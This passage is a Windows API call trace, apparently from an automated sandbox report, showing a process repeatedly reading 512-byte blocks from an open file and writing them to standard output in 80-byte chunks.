dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0132.233] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] GetFileType (hFile=0x58) returned 0x1 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2cdd6c | out: lpFileSizeHigh=0x2cdd6c*=0x0) returned 0x7d600 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] GetFileType (hFile=0x50) returned 0x1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] GetFileType (hFile=0x50) returned 0x1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.236] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.237] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.238] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.238] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.239] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.239] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.240] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.240] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.241] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.242] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.242] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.243] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle 